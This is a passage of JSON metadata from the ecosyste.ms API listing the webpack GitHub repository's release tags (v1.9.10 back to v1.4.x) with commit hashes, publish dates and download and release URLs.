yste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.10/manifests"},{"name":"v1.9.9","sha":"407d1bc76b41717a47f87211ffd6cbdfff6c7b1e","kind":"tag","published_at":"2015-05-24T07:35:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.9/manifests"},{"name":"v1.9.8","sha":"69df24cc562c10caf5c02f36459ecacb7cd1823d","kind":"tag","published_at":"2015-05-21T22:16:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.8/manifests"},{"name":"v1.9.7","sha":"0990aaa4754969e34184657577389b88fd845e87","kind":"tag","published_at":"2015-05-17T17:18:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.7/manifests"},{"name":"v1.9.6","sha":"c5eceb0b2cf31fca84e724d3893d44c7042b9038","kind":"tag","published_at":"2015-05-15T15:24:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.6/manifests"},{"name":"v1.9.5","sha":"e37a50683f74d6996373186db757289256a41bf7","kind":"tag","published_at":"2015-05-12T19:21:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.5/manifests"},{"name":"v1.9.4","sha":"ac84ef731540635f615438cc8f4424ff63003ce1","kind":"tag","published_at":"2015-05-10T16:45:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.4/manifests"},{"name":"v1.9.3","sha":"c7ac77fc907950dcf0dc355fae86164f688f9857","kind":"tag","published_at":"2015-05-10T14:44:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.3/manifests"},{"name":"v1.9.2","sha":"0576143e96be118e4621f79db4b8d03b6d2c808e","kind":"tag","published_at":"2015-05-10T12:37:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"98663e71dbacfb82e02379671a821a373150dc7c","kind":"tag","published_at":"2015-05-10T11:53:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"0e21e6ec0b2e4ebc085c9e6ccf823480384e3943","kind":"tag","published_at":"2015-05-10T10:23:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.0/manifests"},{"name":"v1.8.11","sha":"f7d7d30ee647dd8fc77972752d5b9fc47bbe09ea","kind":"tag","published_at":"2015-04-29T10:49:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.11/manifests"},{"name":"v1.8.10","sha":"8e490bdee33dd4edea82c6d13ba80c6fe3246218","kind":"tag","published_at":"2015-04-26T20:50:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.10/manifests"},{"name":"v1.8.9","sha":"e4453c78edb4613804c0c0a0e9f447d2def533c3","kind":"tag","published_at":"2015-04-21T21:34:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.9/manifests"},{"name":"v1.8.8","sha":"924e02c98aba21b65d913a1f0e16d8818f018c3b","kind":"tag","published_at":"2015-04-21T06:38:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.8/manifests"},{"name":"v1.8.7","sha":"0bc887a06c7f34a95e2756097f193f15ec1a443d","kind":"tag","published_at":"2015-04-20T18:51:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.7/manifests"},{"name":"v1.8.6","sha":"a27641f8cc68ec557d9ca524afbbfb3b34ec2408","kind":"tag","published_at":"2015-04-20T17:46:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.6/manifests"},{"name":"v1.8.5","sha":"53a534663446bfaa8fc4b3c202542d6a8a2aaadc","kind":"tag","published_at":"2015-04-17T08:26:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.5/manifests"},{"name":"v1.8.4","sha":"bffe6037e99c7a741d64414368295b026d81c81a","kind":"tag","published_at":"2015-04-10T08:23:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.4/manifests"},{"name":"v1.8.3","sha":"13c3a3c3445ac9b76f3fe2602963e8748673b458","kind":"tag","published_at":"2015-04-09T22:19:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.3/manifests"},{"name":"v1.7.4","sha":"43a12294470d9e0337a325095e0fd4a3669ed6c6","kind":"tag","published_at":"2015-04-09T22:14:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.4/manifests"},{"name":"v1.8.2","sha":"4c2b7a9ea5b45481ad408c8275ef58e6140a038f","kind":"tag","published_at":"2015-04-08T13:12:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"af22dce84cb13facf372f179a6a174cafa0397dd","kind":"tag","published_at":"2015-04-08T06:11:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"1f74f58273ae008e315275c6caa31ae3fad42551","kind":"tag","published_at":"2015-04-07T12:34:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.0/manifests"},{"name":"v1.7.3","sha":"b1da5ed5c69f02cb9a4215a56157267b1de9a11b","kind":"commit","published_at":"2015-03-11T22:50:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"17d9dc161c7c8f969d83cb8503fead40db9798d9","kind":"commit","published_at":"2015-03-04T06:45:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"d09c8e713823c705cefea77bc34db6ab0e1cc0c3","kind":"commit","published_at":"2015-03-03T22:41:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.1/manifests"},{"name":"v1.7.0","sha":"e5b5fa6da79def97ac6c1017f3595fcefd5a74dd","kind":"commit","published_at":"2015-03-03T19:43:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.0/manifests"},{"name":"v1.6.0","sha":"ad81998305456c8447ce09d5ef2d4c950f7a4184","kind":"commit","published_at":"2015-02-23T22:02:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.6.0/manifests"},{"name":"v1.5.3","sha":"e46e5cbc514b17cc893dde394edc9a8a25baa5eb","kind":"commit","published_at":"2015-01-21T19:27:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.3/manifests"},{"name":"v1.5.2","sha":"bdabadf34f871fd19b1f960df6b8ab15ea915154","kind":"commit","published_at":"2015-01-21T19:25:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.2/manifests"},{"name":"v1.5.1","sha":"558ee89277d41529ff143af8e050f4c2917ea4b6","kind":"commit","published_at":"2015-01-17T23:50:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.1/manifests"},{"name":"v1.5.0","sha":"0e36e7e936b126dba526bddac557566ee982c432","kind":"commit","published_at":"2015-01-17T22:43:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.0/manifests"},{"name":"v1.4.15","sha":"431bd659be6dcd35fbe993a3a528d5774e82f745","kind":"commit","published_at":"2014-12-28T00:26:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.15","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.15/manifests"},{"name":"v1.4.14","sha":"6c45e24e4039f7298bfa8ca08a9614abc7aeaf08","kind":"commit","published_at":"2014-12-22T14:29:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.14","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.14/manifests"},{"name":"v1.4.13","sha":"34c509740b722ac9898ed262f88a8bba9d3237b7","kind":"commit","published_at":"2014-11-05T23:28:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.13/manifests"},{"name":"v1.4.12","sha":"5edcaea76d900134a50e5a16a07ab5da75c80c6a","kind":"commit","published_at":"2014-11-03T07:10:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.12/manifests"},{"name":"v1.4.11","sha":"8c606b490b248000466cc5be01019ce7d2eea407","kind":"commit","published_at":"2014-11-02T12:18:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.11/manifests"},{"name":"v1.4.10","sha":"9a375a770a9b1b235361dcda92844acad196dd47","kind":"commit","published_at":"2014-10-31T11:46:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.10/manifests"},{"name":"v1.4.9","sha":"b02ef8b2c386d34441af4b42aab248aeed014214","kind":"commit","published_at":"2014-10-26T10:19:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.9/manifests"},{"name":"v1.4.8","sha":"c6e1a8fb6d8714dec5bd05b7a6ae80b71b6e0262","kind":"commit","published_at":"2014-10-16T20:31:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.8/manifests"},{"name":"v1.4.7","sha":"4c0e1974e5c49ee4063cf301d49dc977f77a85b6","kind":"commit","published_at":"2014-10-13T14:10:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.7/manifests"},{"name":"v1.4.6","sha":"f0997230f35361ab62c2300133aece93f3ca1cc3","kind":"commit","published_at":"2014-10-12T10:30:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"272d7219cdec5f041e98e2163078c6d2ea772bdf","kind":"commit","published_at":"2014-10-07T13:56:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.5/manifests"},{"name":"v1.4.4","sha":"2bcb6f9bca77d5d4a42efface7c1e274412b5b64","kind":"commit","published_at":"2014-09-26T06:54:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.4/manifests"},{"name":"v1.4.3","sha":"91c7426e4595f0d3c45efc9c1e17b40d875e6de2","kind":"commit","published_at":"2014-09-23T06:43:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.3/manifests"},{"name":"v1.4.2","sha":"c117ec46eaa149d3732157744467e58b2baf4517","kind":"commit","published_at":"2014-09-22T21:51:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.2/manifests"},{"name":"v1.4.1-beta1","sha":"c59727720e4bf1feb5a1939b69154ceec0111ed0","kind":"commit","published_at":"2014-09-19T06:13:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.1-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.1-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.1-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.1-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.1-beta1/manifests"},{"name":"v1.4.0-